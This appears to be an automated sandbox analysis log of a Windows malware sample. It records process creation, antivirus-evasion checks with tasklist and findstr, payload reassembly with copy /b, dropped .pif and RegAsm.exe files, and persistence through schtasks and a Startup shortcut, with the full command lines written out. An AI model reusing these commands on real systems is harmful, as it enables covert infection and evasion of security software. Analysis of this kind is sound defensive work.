Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 684126	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VegetablesIndividualBindingGba" Ever	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\684126\Intake.pif Intake.pif C	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y"	Jump to behavior

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Section loaded: textshaping.dll

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Static file information: File size 1414800 > 1048576

Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 0000001A.00000000.3138021219.0000000000CC2000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001A.00000000.3138021219.0000000000CC2000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Code function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405BBF

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00338B75 push ecx; ret		18_2_00338B88
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00338B75 push ecx; ret		20_2_00338B88

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\684126\Intake.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	File created: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	File created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	File created: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url

Jump to behavior

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_003959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	18_2_003959B3
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00325EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	18_2_00325EDA
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_003959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	20_2_003959B3
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00325EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	20_2_00325EDA

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_003333B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_003333B7

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
